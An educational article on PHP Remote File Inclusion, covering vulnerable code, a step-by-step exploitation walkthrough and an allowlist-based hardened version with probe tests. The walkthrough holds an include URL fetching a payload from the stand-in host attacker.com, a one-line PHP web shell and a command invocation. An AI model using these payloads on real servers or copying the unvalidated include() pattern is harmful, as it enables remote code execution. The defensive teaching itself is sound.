What is Remote File Inclusion?

RFI (Remote File Inclusion) is a critical web vulnerability that lets an attacker make the application include, and therefore execute, a file fetched from a server the attacker controls. It arises when user input is passed unvalidated to a dynamic file-loading function. It is most commonly found in PHP applications that feed request parameters to include(), include_once(), require() or require_once(); in PHP the remote fetch only works when the allow_url_include directive is enabled (it has defaulted to Off since PHP 5.2.0 and is deprecated as of PHP 7.4), which is why RFI is rarer today than its local counterpart.

💥 How Does RFI Work?

Consider the following vulnerable PHP code:

// vulnerable.php
<?php
  $page = $_GET['page'];
  include($page);  // No validation: with allow_url_include=On, $page may be a remote URL
?>

An attacker exploits this by passing a URL instead of a file name:

https://vulnerable-site.com/vulnerable.php?page=http://attacker.com/shell.txt

PHP fetches http://attacker.com/shell.txt and evaluates it as PHP, so any code it contains runs on the target server with the web server's privileges. The attacker serves the payload with a .txt extension (or otherwise as raw text) so that their own server does not execute the PHP; only the target does.

📚 RFI vs LFI: What's the Difference?

RFI (Remote File Inclusion) loads files from remote URLs such as http://evil.com/shell.txt; the attacker supplies the code that runs.
LFI (Local File Inclusion) includes files that already exist on the server, such as /etc/passwd or ../../index.php; on its own it leaks file contents, and it becomes code execution only if the attacker can first plant PHP in a local file (for example via an upload or log poisoning). Both share the same root cause: an unvalidated path handed to include().

🛠️ Step-by-Step Exploitation Example

  1. Find a parameter that loads files dynamically (e.g. ?page=, ?file=, ?template=)
  2. Confirm inclusion with a harmless marker file first: ?page=http://attacker.com/info.txt, where info.txt contains a unique string (or a phpinfo() call); if it appears in the response, the remote fetch works
  3. Prepare a remote malicious script with a PHP payload, served as plain text so the attacker's own server does not execute it:
    // shell.txt
    <?php system($_GET['cmd']); ?>
  4. Trigger the payload: ?page=http://attacker.com/shell.txt&cmd=whoami

If vulnerable, the server fetches shell.txt, executes it, and returns the output of whoami: the account the web server runs as.

🌐 Real-World Case Study

In 2007, a vulnerability in PHP-Nuke allowed attackers to inject remote shells via RFI. Thousands of websites were compromised. Even today, legacy applications remain exposed wherever allow_url_include is still enabled: the directive has defaulted to Off since PHP 5.2.0 and is deprecated as of PHP 7.4, but old deployments that switched it on for convenience keep the remote code path alive.

✅ Prevention Techniques
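The hardened counterpart of vulnerable.php, written for this article as an added example (it is not code from the original page): the ?page= value is never used as a path, it is looked up in a fixed allowlist, and the payloads from the step-by-step section above (a remote URL, a traversal string, the php:// and data: wrappers) are all rejected. The page names and file paths in PAGES are assumptions for illustration; the probe list at the bottom is constructed input so the check can be run offline with the PHP CLI.

```php
<?php
// hardened.php (added example, not the original article's code):
// the user-supplied page name is a key into an allowlist, never a path.
declare(strict_types=1);

// Allowlist: untrusted key => file relative to this script (assumed layout).
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map the untrusted ?page= value to an allowlisted file.
 * Returns the absolute path to include, or null if the value is not allowed.
 * Remote URLs (http://attacker.com/shell.txt), stream wrappers (php://input,
 * data:) and traversal (../../etc/passwd) are all rejected because they are
 * not keys in PAGES and do not match the identifier pattern.
 */
function resolvePage(string $page): ?string
{
    // Defence in depth: only short plain identifiers reach the lookup, so a
    // later edit to PAGES cannot quietly reintroduce a URL or a path.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$page];
}

// Request handler: this replaces the body of vulnerable.php.
if (PHP_SAPI !== 'cli') {
    $path = resolvePage($_GET['page'] ?? 'home');
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}

// Offline self-check with constructed inputs, including the payloads from
// the exploitation steps. Run with: php hardened.php
$probes = [
    'home'                              => true,
    'http://attacker.com/shell.txt'     => false,
    'http://attacker.com/info.txt'      => false,
    '../../etc/passwd'                  => false,
    'php://input'                       => false,
    'data://text/plain;base64,PD9waHA=' => false,
    'HOME'                              => false, // keys are case-sensitive
];
foreach ($probes as $input => $expectAllowed) {
    $allowed = resolvePage($input) !== null;
    printf("%-36s %s\n", $input, $allowed ? 'allowed' : 'rejected');
    if ($allowed !== $expectAllowed) {
        fwrite(STDERR, "FAIL: unexpected result for $input\n");
        exit(1);
    }
}
```

The allowlist is the real control; the regular expression is a second layer so that an input which is not a key can never be interpreted as a URL or a path, even if the map is later edited carelessly. Pair this with allow_url_include = Off in php.ini (and allow_url_fopen = Off if the application does not need remote streams at all), and consider open_basedir to confine whatever include() can reach even when the application layer fails.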

📌 Tools & Resources

💡 Pro Tips